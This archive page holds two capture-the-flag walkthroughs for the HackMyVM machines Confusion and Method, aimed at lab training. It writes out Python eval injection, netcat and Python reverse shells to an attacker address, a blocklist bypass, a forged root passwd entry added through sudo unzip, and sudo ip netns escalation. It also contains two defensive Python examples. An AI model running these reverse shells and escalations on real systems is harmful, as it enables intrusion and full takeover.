Daily archive: 29 October 2021

HackMyVm Confusion Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Confusion

Scan ports.

```bash
~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 15:59 CST
Nmap scan report for 192.168.56.100
Host is up (0.0040s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
32145/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, NULL, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     Welcome To The My Magic World
|     many times you want to ping?:
...
```

Use nc to connect to port 32145.

```bash
~ nc 192.168.56.100 32145
Welcome To The My Magic World

How many times you want to ping?: 2
PING localhost(localhost (::1)) 56 data bytes
64 bytes from localhost (::1): icmp_seq=1 ttl=64 time=0.086 ms
64 bytes from localhost (::1): icmp_seq=2 ttl=64 time=0.035 ms
```

If we input an invalid number, we get an error message.

```bash
~ nc 192.168.56.100 32145
Welcome To The My Magic World

How many times you want to ping?: 12;
Traceback (most recent call last):
  File "/opt/ping.py", line 7, in <module>
    no_of_packets = int(input("How many times you want to ping?: "))
  File "<string>", line 1
    12;
      ^
SyntaxError: unexpected EOF while parsing
^C
```

The traceback shows that our answer is evaluated as a Python expression (Python 2's input() behaviour), so if we input Python code, it runs.

```bash
~ nc 192.168.56.100 32145
Welcome To The My Magic World

How many times you want to ping?: __import__("os").system("id")
uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)
PING localhost(localhost (::1)) 56 data bytes
```

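How the count prompt should have been handled, as an added example (not the VM's /opt/ping.py, whose source is not shown): read text, never evaluate it, accept only a short run of digits in a fixed range, and hand the count to ping as an argv list instead of a shell line. The function names and the MAX_PACKETS cap are this example's own assumptions.

```python
"""Hardened handling for the 'How many times you want to ping?' prompt.

Added example, not the VM's /opt/ping.py. The service on port 32145 hands
the answer to eval (Python 2 input() is eval(raw_input())), which is why
'12;' produces a SyntaxError in "<string>" and Python code runs. Here the
text is validated first and ping is started without a shell.
MAX_PACKETS and the function names are assumptions of this example."""
import re
import subprocess

MAX_PACKETS = 10                       # assumed cap for this example
COUNT_RE = re.compile(r"[0-9]{1,3}")   # digits only: no sign, no expression


class BadCount(ValueError):
    """The supplied text is not an acceptable packet count."""


def parse_packet_count(raw: str) -> int:
    """Return an int in 1..MAX_PACKETS or raise BadCount.

    '12;' and '__import__("os").system("id")' fail the regex before any
    conversion happens, so attacker-controlled text is never evaluated.
    """
    text = raw.strip()
    if not COUNT_RE.fullmatch(text):
        raise BadCount(f"not a plain integer: {text!r}")
    count = int(text)
    if not 1 <= count <= MAX_PACKETS:
        raise BadCount(f"{count} is outside 1..{MAX_PACKETS}")
    return count


def is_valid_count(raw: str) -> bool:
    """True when parse_packet_count would accept the text."""
    try:
        parse_packet_count(raw)
    except BadCount:
        return False
    return True


def build_ping_argv(raw: str, target: str = "localhost") -> list:
    """argv for ping with the validated count; list form means no shell."""
    return ["ping", "-c", str(parse_packet_count(raw)), target]


if __name__ == "__main__":
    answer = input("How many times you want to ping?: ")  # Python 3: text only
    if is_valid_count(answer):
        subprocess.run(build_ping_argv(answer), check=False)
    else:
        print("Rejected: enter a number from 1 to", MAX_PACKETS)
```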
So we can get a reverse shell.

```bash
~ nc 192.168.56.100 32145
Welcome To The My Magic World

How many times you want to ping?: __import__("os").system("nc 192.168.56.150 1234 -e /bin/bash")
──────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:39196.
id
uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)
```

Spawn an interactive shell.

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
iamroot@confusion:/$ id
id
uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)
iamroot@confusion:/$
```


Upload id_rsa.pub so we can log in over SSH as iamroot.

```bash
iamroot@confusion:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
```

There are 3 users; check sudo -l.

```bash
iamroot@confusion:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 Oct 25 08:44 .
drwxr-xr-x 18 root root 4096 Oct 25 06:02 ..
drwxr-xr-x 2 iamroot iamroot 4096 Oct 25 15:16 iamroot
drwxr-xr-x 3 sammy sammy 4096 Oct 25 14:56 sammy
drwxr-xr-x 2 still still 4096 Oct 25 14:56 still
iamroot@confusion:/home$ sudo -l
sudo -l
Matching Defaults entries for iamroot on confusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User iamroot may run the following commands on confusion:
(!root) NOPASSWD: /bin/bash
```

But no matter what I input, it still asks for a password.

Then we check the SSH login banner of user still.

```bash
~ ssh still@192.168.56.100
Have you ever thought?
     If
  Cindrella's
    Shoe Fit
   Perfectly
    Then Why
   Did It Fall
     Off?
still:confused?
Then go for Port 32145 :)
```

The default shell has been modified for still.

```bash
iamroot@confusion:/home$ cat /etc/passwd
...
still:x:1001:1001::/home/still:/home/still/SoMuchConfusion
```

We can check the source code of /home/still/SoMuchConfusion.

```bash
iamroot@confusion:/home$ su still
Password:
Welcome To My Secret Most Secure Shell :p
cat /home/still/SoMuchConfusion
# The fake shell echoes the file with its newlines collapsed; the script is
# restored to one statement per line here. The trailing "command not found"
# it prints comes from its own else branch.
#!/bin/bash
echo "Welcome To My Secret Most Secure Shell :p"
read secure_shell
if [[ $secure_shell == "id" ]]
then
    echo "uid=0(root) gid=0(root) groups=0(root)"
elif [[ $secure_shell == "whoami" ]]
then
    echo "root"
elif [[ $secure_shell == "python3" ]]
then
    echo `$secure_shell`
elif [[ $secure_shell =~ ^nc || $secure_shell =~ ^bash || $secure_shell =~ ^python* ]]
then
    echo "Smooooooth Hehe :p"
elif [[ -z $secure_shell ]]
then
    echo "Bye-Bye"
else
    echo `$secure_shell` command not found
fi
```
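Why that prefix blocklist fails, and the allowlist a defender would use instead, as an added example (not the VM's script): decide_blocklist reproduces the decision order of the bash [[ ... ]] chain above so the verdict for any input can be tested, and decide_allowlist is the replacement. The ALLOWED set and all function names are this example's own assumptions.

```python
"""Model of the SoMuchConfusion blocklist beside an allowlist.

Added example, not the VM's script. decide_blocklist mirrors the bash
decision chain; decide_allowlist is the hardened alternative.
ALLOWED and the function names are assumptions of this example."""
import re

# The three =~ patterns from the script. They are anchored only at the start,
# so any interpreter whose name does not begin with nc/bash/pytho passes.
BLOCKED_PREFIXES = [re.compile(p) for p in (r"^nc", r"^bash", r"^python*")]


def decide_blocklist(cmd: str) -> str:
    """Verdict of the original script for one line typed at the prompt."""
    if cmd in ("id", "whoami"):
        return "fake-output"       # canned "root" answers, nothing runs
    if cmd == "python3":
        return "execute"           # echo `$secure_shell` runs it
    if any(p.search(cmd) for p in BLOCKED_PREFIXES):
        return "blocked"           # "Smooooooth Hehe :p"
    if cmd == "":
        return "exit"              # "Bye-Bye"
    return "execute"               # else branch also runs the command


ALLOWED = {"id", "whoami", "date", "uptime"}   # assumed allowlist for this example


def decide_allowlist(cmd: str) -> str:
    """Allowlist: only an exact, argument-free entry is executed. No regex
    and no prefix matching, so picking another interpreter cannot help."""
    return "execute" if cmd.strip() in ALLOWED else "blocked"


def compare(cmds) -> dict:
    """Map each input line to (blocklist verdict, allowlist verdict)."""
    return {c: (decide_blocklist(c), decide_allowlist(c)) for c in cmds}


if __name__ == "__main__":
    for line, (block, allow) in compare(["id", "bash", "/usr/bin/dash -i", ""]).items():
        print(f"{line!r:22} blocklist={block:12} allowlist={allow}")
```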

So we need to bypass the blacklist to get a shell as user still. Here I choose /usr/bin/dash.

```bash
iamroot@confusion:/home$ su still
Password:
Welcome To My Secret Most Secure Shell :p
/usr/bin/dash -i
$ nc 192.168.56.150 1234 -e /bin/bash
───────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:39226.
id
uid=1001(still) gid=1001(still) groups=1001(still)
```
Spawn an interactive shell again and check sudo -l.

```bash
still@confusion:~$ sudo -l
sudo -l
Matching Defaults entries for still on confusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User still may run the following commands on confusion:
(sammy) NOPASSWD: /usr/bin/python3 /opt/password.py
```

Running it, we get an encrypted string.

```bash
still@confusion:~$ sudo -u sammy /usr/bin/python3 /opt/password.py
sudo -u sammy /usr/bin/python3 /opt/password.py
QWJCYXJQbmFQZW5weFpsQ25mZmpiZXEK
```

Try to decrypt it with ROT13. Then we can log in as user sammy.

```bash
~ ssh sammy@192.168.56.100    ...
sammy@192.168.56.100's password:
sammy@confusion:~$ id
uid=1000(sammy) gid=1000(sammy) groups=1000(sammy),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)
```

Check sudo -l.

```bash
sammy@confusion:~$ sudo -l
Matching Defaults entries for sammy on confusion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sammy may run the following commands on confusion:
(root) NOPASSWD: /usr/bin/unzip
```

Then we can modify /etc/passwd, zip it, and unzip it back to /etc.

```bash
sammy@confusion:~$ cp /etc/passwd ./
sammy@confusion:~$ openssl passwd 123
fpjdFvRQf46EA
sammy@confusion:~$ echo "root2:fpjdFvRQf46EA:0:0:root:/root:/bin/bash" >> passwd
sammy@confusion:~$ zip passwd.zip passwd
  adding: passwd (deflated 63%)
sammy@confusion:~$ sudo unzip passwd.zip -d /etc
Archive:  passwd.zip
  inflating: /etc/etc/passwd
replace /etc/passwd? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
  inflating: /etc/passwd
```

Finally, we get root.

```bash
sammy@confusion:~$ su root2
Password:
root@confusion:/home/sammy# id;hostname
uid=0(root) gid=0(root) groups=0(root)
confusion
```

HackMyVm Method Walkthrough

Scan ports first.

```bash
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for bogon (192.168.56.100)
Host is up (0.0025s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   3072 4b:24:34:1f:41:10:88:b7:5a:6a:63:d9:f6:75:26:6f (RSA)
|   256 52:46:e7:20:68:c1:6f:90:2f:a6:ad:ee:6d:87:e7:28 (ECDSA)
|_  256 3f:ce:97:a9:1e:f4:60:f4:0e:71:e7:46:58:28:71:f0 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Test Page for the Nginx HTTP Server on Fedora
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Enumerate port 80; remember to include the .htm extension.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .htm,.html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log --exclude-length 3690

/index.htm (Status: 200) [Size: 344]
/note.txt (Status: 200) [Size: 23]
/secret.php (Status: 302) [Size: 0] [--> https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg]
```

Check the source code of index.htm.

```bash
~ curl http://192.168.56.100/index.htm
<h1>It's Hacking Time</h1>
<img src="hacker.gif" alt="Hacker" height="640" width="640">
<img hidden="true" src="office.gif" alt="hahahahaha" height="640" width="640">
<form action="/secret.php" hidden="true" method="GET">
<input type="text" name="HackMyVM" value="" maxlength="100"><br>
<input type="submit" value="Submit">
</form>
```

With the hint from index.htm, we can call secret.php with the HackMyVM parameter.

```bash
~ curl 'http://192.168.56.100/secret.php?HackMyVM=id'
Now the main part what it is loooooool<br>Try other method
```

It seems the GET method is not the right one. Let's try POST.

```bash
~ curl 'http://192.168.56.100/secret.php' -d 'HackMyVM=id'
You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>
```


Then we can get a reverse shell.

```bash
~ curl 'http://192.168.56.100/secret.php' -d 'HackMyVM=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22%2fbin%2fbash%22,%22-i%22%5D);%27'
──────────────────────────────────────────────────────────────────────────────────
~ nc -nvlp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:45958.
bash: cannot set terminal process group (333): Inappropriate ioctl for device
bash: no job control in this shell
www-data@method:~/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@method:~/html$
```

Check the source code of secret.php.

```bash
www-data@method:~/html$ cat secret.php
cat secret.php
<?php
...
else {
header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg");
}
$ok="prakasaka:th3-!llum!n@t0r";
?>
```

Escalate to user prakasaka.

```bash
www-data@method:~/html$ su prakasaka
su prakasaka
Password: th3-!llum!n@t0r
id
uid=1000(prakasaka) gid=1000(prakasaka) groups=1000(prakasaka),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)
```

Log in over SSH as user prakasaka and check sudo -l.

```bash
prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User prakasaka may run the following commands on method:
(!root) NOPASSWD: /bin/bash
(root) /bin/ip
```

We can get root.

```bash
prakasaka@method:~$ sudo ip netns add foo
prakasaka@method:~$ sudo ip netns exec foo /bin/sh

# id;hostname
uid=0(root) gid=0(root) groups=0(root)
method
```